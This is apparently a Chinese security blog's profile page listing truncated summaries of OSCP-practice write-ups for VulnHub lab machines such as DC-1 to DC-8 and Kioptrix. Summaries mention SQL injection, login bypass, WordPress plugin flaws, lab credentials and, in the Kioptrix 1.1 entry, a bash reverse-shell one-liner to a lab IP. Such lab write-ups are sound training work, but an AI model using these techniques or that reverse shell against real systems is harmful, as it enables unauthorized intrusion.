3 Bubble_zhu

尚未进行身份认证

暂无相关简介

等级
TA的排名 5k+

oscp——Bot Challenges: RA1NXing Bots

0x00 目标资料 37链接https://www.vulnhub.com/entry/bot-challenges-ra1nxing-bots,52/难度推荐 3思路 1web——webshell 1.5webshell——rootshel 0.5环境搭建vmbox0x01 信息收集IPmasscan 192.168.124.1/24 --ping --rate 1...

2020-02-28 15:24:56

oscp——Kioptrix: Level 1.3 (#4)

0x00 目标资料 36链接https://www.vulnhub.com/entry/kioptrix-level-13-4,25/难度推荐 4思路 1端口 0.5web——usershell 1usershell——rootshell 1.5环境搭建VMware下载下来之后是一个vmdx的文件,所以要经过处理这里新建一个虚拟机,选择其他移除原来的硬盘加载下...

2020-02-28 13:54:02

oscp——xerxes-1

0x00 目标资料 35链接https://www.vulnhub.com/entry/xerxes-1,58/难度推荐 4思路 1环境搭建vmbox0x01 信息收集IP masscan 192.168.124.1/24 --ping --rate 1000000000000000000000000000000端口nmap -A 192.168.124.15...

2020-02-28 13:52:36

oscp——Hackademic: RTB2

0x00 前言这是第34台机子啦。0x01 信息收集0x02 Web80——webshell访问一下80端口的内容这里使用万能密码进行绕过,获取到秘钥先进行一个url的解码然后进行ascii解码先将空格去除00110001 00110000 00110000 00110001 00111010 00110001 00110001 ...

2020-02-22 10:15:08

oscp——Hackademic: RTB1

0x00 前言这是第33台机子啦0x01 信息收集0x02 Web80——webshell访问一下网站,发现一个说明,这个时候一般都是要扫一下目录。这里找到了一个特别的url,这里测试了一下sql注入http://192.168.25.207/Hackademic_RTB1/?cat=1拿到了一些账号密码,使用GeorgeMiller q1w2e3 进行登录写一个反弹s...

2020-02-22 10:11:09

oscp——Kioptrix: Level 1.1 (#2)

0x00 前言第三十二台机子0x01 信息收集0x02 Web80-webshell访问页面之后发现是一个登录页面,这种页面看起来就像是一个SQL注入,试一下万能密码成功进入后台,可以看到是一个执行ping命令的执行窗口这里反弹一下shell,这里使用bash -i >& /dev/tcp/192.168.0.111/1234 >&1然后在/...

2020-02-20 11:49:48

oscp——HA: Wordy

0x00 前言这个是做的第31台机子了。0x01 信息收集0x02 Web访问一下然后跑一下目录,拿到一个目录http://192.168.0.117/wordpress/是一个wp的站,扫一下插件和用户这里mail-masta查一下洞有一个EIF还有一个sql需要账号密码reflex gallery这个插件的洞,有一个文件上传,进行上传site edit...

2020-02-18 19:11:39

oscp——EVM:1

0x00 前言这个是做的第30台机子了。难度很低,基本webshell拿到手就ok了0x01 信息收集0x02 端口samba没找到什么内容0x03 Web访问为默认页面进行目录遍历找到一个wp的站然后扫一下插件,以及用户发现一个插件有EIF但是没法拿到shell爆破用户拿到账号密码登录之后反弹shell随便看一看。。。就拿到flag了。。。0x0...

2020-02-12 14:10:11

oscp——In Plain Sight: 1.0.1

0x00 前言这个是第29台机子,难度感觉不在题目,而在脑洞和细心。0x01 信息收集0x02 端口ftp这里找到了一点东西,有一个文件,翻译一下0x03 Web访问之后发现是一个WP的站绑定下host对wp站进行一个扫描找到一个账号但是我爆破半天没反应。之后在默认页面看到了 index.htnl,注意是 index.htnl看到了一张图片点击之后到了这里上...

2020-02-11 21:01:46

oscp——DC-8

0x00 前言这个是第28台机子,这个机子的难度实际并不是很大,只是很多东西都没有接触过。0x01 信息收集0x02 Web访问一下目标页面扫目录,发现一个0的文件打开之后发现是一个drupal的站这里发现一个nid的参数,试一下sql注入存在sql注入找到密码用john跑出来了一个密码找到登录页面进行登录,登录之后选择contact us,然后点击Webf...

2020-02-10 21:09:13

oscp——DC-7

0x00 前言这个是第27台机子,这个机子个人以为还是有点费脑子的。0x01 信息收集0x02 Web访问一下web页面 是一个Drupal的站试了试我多个exp 都没用,最后看了提示才知道要去推特上找 Dc7User这个人然后找到了这里,有一个账号密码 dc7user MdR3xOgB7#dW这里成功登陆看到有邮件提示这里看到这个sh的内容看到大佬说的这...

2020-02-10 14:43:17

oscp——DC-6

0x00 前言这个是第26台机子,难度感觉就在wp的插件上了。其他的都没什么0x01 信息收集0x00 Web首先绑定下域名wp站,然后wpscan扫一下,这里发现了一些用户在下载网页上有这样一个提示然后生成字典进行爆破拿到一个账号密码mark, Password: helpdesk01登录之后发现有一个activity monitor插件找一下漏洞dump下...

2020-02-09 18:12:46

oscp——DC-5

0x00 前言这个是第二十五台机子了,还是没有做出来,不过学到了新的东西0x01 信息收集1.ip2.端口0x02 Web这里直接访问,发现是一个介绍内容跑一下目录发现footer.php和thankyou.php访问thankyou.phpfooter.php这里看了大佬的wp才知道可能有EIFhttp://192.168.0.149/thankyou.php...

2020-02-08 19:45:11

oscp——DC-4

0x00 前言这个是第二十四台机子了,终于这台机子是自己独立完成的了。0x01 信息收集0x02 端口首先访问一下目标站点可以爆破,爆破拿到密码 happy然后进行登录找到一个命令执行反弹一下shell在/home/jim/backups目录下找到一个密码,试试ssh爆破jim jibril04然后ssh连接之后可以看到一份邮件,拿到Charles得到账号密...

2020-02-07 12:43:55

oscp——DC-3

0x00 前言这个是第二十三台机子了,这台机子里的东西全部都是新的东西,值得做的必要0x01 信息收集0x02 Web访问一下网站通过wappalyzer进行判断是一个joomla的cms,用工具扫描一下然后找一下相关漏洞发现存在sql注入-m dump下来可以看到通过sqlmap可以拿到一个账号和加密的密码然后使用john进行爆破,可以拿到一个账号密码ad...

2020-02-06 16:30:11

oscp——DC-2

0x00 前言第二十二台机子了,继续努力鸭0x01 信息收集全端口扫描0x01 Web修改host之后发现是一个wp的站打开flag,有一个提示,用 cewl收集密码先用wpscan跑一下然后cewl 收集密码cewl http://dc-2/ -w ./wordlist.txt使用wpscan进行爆破,我们可以拿到两个账号的账号和密码tom, Passwor...

2020-02-06 16:21:36

oscp——DC-1

0x00 前言这个是第二十一台机子,现在准备复习两台旧的,做一台新的。加油。0x01 信息收集IP端口信息0x02 测试提取->webshell访问发现是一个Drupal的站,直接cve打一下简单描述下就是使用CVE-2018-7600直接拿到shell弹回来了一个shell到home目录下拿到一个flag在var目录下看到flag1查一下suidfi...

2020-02-04 21:52:39

oscp——Os-hackNos-1

0x00 前言这个是第十九台机子了,感觉有点感觉了,但是还是差一点东西。54ix5aW96ICB5amG链接https://www.vulnhub.com/entry/hacknos-os-hacknos,401/0x01 信息收集ip端口0x02 攻击1.端口端口无果2.web访问80端口然后进行目录遍历,可以看到一个是一个drupal的cms先判断下版本...

2020-02-03 14:06:30

oscp——hackNos: Os-Hax

0x00 前言这个是第十九台机子了, 不知不觉已经做了这么多东西了。最后,我们来一个现学现用Dear E-Commerce professional ; This letter was speciallyselected to be sent to you . We will comply with allremoval requests ! This mail is being sen...

2020-02-03 10:40:08

oscp——Os-hackNos-3

0x00 前言这个是第十八台机子了,之前做过同系列的Os-hackNos-2.1。最后,E788B1E88081E5A986E5939F链接https://www.vulnhub.com/entry/hacknos-os-hacknos-3,410/0x01 信息收集ip端口0x02 攻击端口端口未果Web80端口访问一下,dirbdirb爆破结果dirb htt...

2020-02-02 18:32:56

查看更多

勋章 我的勋章
  • GitHub
    GitHub
    绑定GitHub第三方账户获取
  • 专栏达人
    专栏达人
    授予成功创建个人博客专栏的用户。专栏中添加五篇以上博文即可点亮!撰写博客专栏浓缩技术精华,专栏达人就是你!
  • 持之以恒
    持之以恒
    授予每个自然月内发布4篇或4篇以上原创或翻译IT博文的用户。不积跬步无以至千里,不积小流无以成江海,程序人生的精彩需要坚持不懈地积累!
  • 1024勋章
    1024勋章
    #1024程序员节#活动勋章,当日发布原创博客即可获得
  • 勤写标兵Lv4
    勤写标兵Lv4
    授予每个自然周发布9篇以上(包括9篇)原创IT博文的用户。本勋章将于次周周三上午根据用户上周的博文发布情况由系统自动颁发。